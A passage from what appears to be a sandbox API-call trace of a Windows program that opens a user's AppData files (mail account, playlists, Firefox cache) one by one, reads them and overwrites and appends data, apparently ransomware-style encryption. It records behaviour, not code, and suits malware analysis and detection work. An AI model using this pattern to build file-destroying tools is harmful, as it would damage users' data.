nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0181.112] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1006c [0181.112] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0181.118] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1006c [0181.119] WriteFile (in: hFile=0x1cc, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0181.119] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0181.119] WriteFile (in: hFile=0x1cc, lpBuffer=0x2893278*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2893278*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0181.119] CloseHandle (hObject=0x1cc) returned 1 [0181.119] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\08_video_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0181.120] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0181.121] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x3fc [0181.121] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0181.121] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0181.121] ReleaseMutex (hMutex=0x168) returned 1 [0181.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="08_Video_rated_at_4_or_5_stars.wpl", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0181.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="08_Video_rated_at_4_or_5_stars.wpl", cchWideChar=34, lpMultiByteStr=0x1fa54dc, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="08_Video_rated_at_4_or_5_stars.wpl", lpUsedDefaultChar=0x0) returned 34 [0181.121] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e99d58, nNumberOfBytesToRead=0x3fc, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99d58*, lpNumberOfBytesRead=0x2e9f2bc*=0x3fc, lpOverlapped=0x0) returned 1 [0181.129] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0181.129] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x984, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x984, lpOverlapped=0x0) returned 1 [0181.129] CloseHandle (hObject=0x1cc) returned 1 [0181.130] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0181.131] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0181.131] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x504 [0181.131] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0181.131] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0181.131] ReleaseMutex (hMutex=0x168) returned 1 [0181.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="04_Music_played_in_the_last_month.wpl", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0181.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="04_Music_played_in_the_last_month.wpl", cchWideChar=37, lpMultiByteStr=0x1fa54dc, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="04_Music_played_in_the_last_month.wpl", lpUsedDefaultChar=0x0) returned 37 [0181.131] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f3e3a8, nNumberOfBytesToRead=0x504, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3e3a8*, lpNumberOfBytesRead=0x2e9f2bc*=0x504, lpOverlapped=0x0) returned 1 [0181.144] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0181.144] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0xa8c, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2e9f2d0*=0xa8c, lpOverlapped=0x0) returned 1 [0181.144] CloseHandle (hObject=0x1cc) returned 1 [0181.145] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0181.146] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0181.146] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x437 [0181.146] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0181.146] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0181.146] ReleaseMutex (hMutex=0x168) returned 1 [0181.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="12_All_Video.wpl", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0181.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="12_All_Video.wpl", cchWideChar=16, lpMultiByteStr=0x1f88b2c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="12_All_Video.wpl", lpUsedDefaultChar=0x0) returned 16 [0181.146] ReadFile (in: hFile=0x1cc, lpBuffer=0x269cae8, nNumberOfBytesToRead=0x437, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269cae8*, lpNumberOfBytesRead=0x2e9f2bc*=0x437, lpOverlapped=0x0) returned 1 [0182.504] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0182.504] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9bf, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x9bf, lpOverlapped=0x0) returned 1 [0182.504] CloseHandle (hObject=0x1cc) returned 1 [0182.504] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0182.505] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0182.506] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x2a0 [0182.506] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0182.506] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0182.506] ReleaseMutex (hMutex=0x168) returned 1 [0182.506] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0182.506] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", cchWideChar=55, lpMultiByteStr=0x1f96bf4, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpUsedDefaultChar=0x0) returned 55 [0182.506] ReadFile (in: hFile=0x1cc, lpBuffer=0x2885e08, nNumberOfBytesToRead=0x2a0, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2885e08*, lpNumberOfBytesRead=0x2e9f2bc*=0x2a0, lpOverlapped=0x0) returned 1 [0182.508] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0182.508] WriteFile (in: hFile=0x1cc, lpBuffer=0x28fc2f8*, nNumberOfBytesToWrite=0x828, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28fc2f8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x828, lpOverlapped=0x0) returned 1 [0182.508] CloseHandle (hObject=0x1cc) returned 1 [0182.508] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0182.509] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0182.509] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x285 [0182.509] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0182.509] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0182.509] ReleaseMutex (hMutex=0x168) returned 1 [0182.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0182.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7352c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0182.510] ReadFile (in: hFile=0x1cc, lpBuffer=0x2885e08, nNumberOfBytesToRead=0x285, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2885e08*, lpNumberOfBytesRead=0x2e9f2bc*=0x285, lpOverlapped=0x0) returned 1 [0182.511] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0182.511] WriteFile (in: hFile=0x1cc, lpBuffer=0x28fc2f8*, nNumberOfBytesToWrite=0x80d, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28fc2f8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x80d, lpOverlapped=0x0) returned 1 [0182.511] CloseHandle (hObject=0x1cc) returned 1 [0182.511] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\soft blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0182.512] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0182.512] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xe8 [0182.512] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0182.512] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0182.512] ReleaseMutex (hMutex=0x168) returned 1 [0182.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Soft Blue.htm", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0182.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Soft Blue.htm", cchWideChar=13, lpMultiByteStr=0x1f733cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Soft Blue.htm", lpUsedDefaultChar=0x0) returned 13 [0182.512] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea4ca8, nNumberOfBytesToRead=0xe8, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea4ca8*, lpNumberOfBytesRead=0x2e9f2bc*=0xe8, lpOverlapped=0x0) returned 1 [0182.513] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0182.513] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a56c8*, nNumberOfBytesToWrite=0x670, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a56c8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x670, lpOverlapped=0x0) returned 1 [0182.513] CloseHandle (hObject=0x1cc) returned 1 [0182.513] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\CBD4Dd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\f6\\cbd4dd01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0182.514] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0182.514] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xa60b [0182.515] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0182.515] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0182.515] ReleaseMutex (hMutex=0x168) returned 1 [0182.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CBD4Dd01", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0182.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CBD4Dd01", cchWideChar=8, lpMultiByteStr=0x1f7352c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CBD4Dd01", lpUsedDefaultChar=0x0) returned 8 [0182.515] ReadFile (in: hFile=0x1cc, lpBuffer=0x28fc2d8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x28fc2d8*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0182.517] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x960b [0182.517] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0182.517] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x960b [0182.518] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebfe08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebfe08*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0182.518] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0182.518] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0182.518] CloseHandle (hObject=0x1cc) returned 1 [0182.519] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\885EEd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\e\\69\\885eed01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0182.520] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0182.520] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x10d22 [0182.520] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0182.520] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0182.520] ReleaseMutex (hMutex=0x168) returned 1 [0182.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="885EEd01", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0182.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="885EEd01", cchWideChar=8, lpMultiByteStr=0x1f7346c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="885EEd01", lpUsedDefaultChar=0x0) returned 8 [0182.520] ReadFile (in: hFile=0x1cc, lpBuffer=0x28fc2d8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x28fc2d8*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0182.522] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xfd22 [0182.523] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0182.523] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xfd22 [0182.523] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebfe08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebfe08*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0182.524] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0182.524] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0182.525] CloseHandle (hObject=0x1cc) returned 1 [0182.525] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0182.526] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0182.526] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x10 [0182.526] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0182.526] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0182.526] ReleaseMutex (hMutex=0x168) returned 1 [0182.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="test-malware-simple.pset", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0182.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="test-malware-simple.pset", cchWideChar=24, lpMultiByteStr=0x1f8fc6c, cbMultiByte=24, lpDefaultChar=0x0, 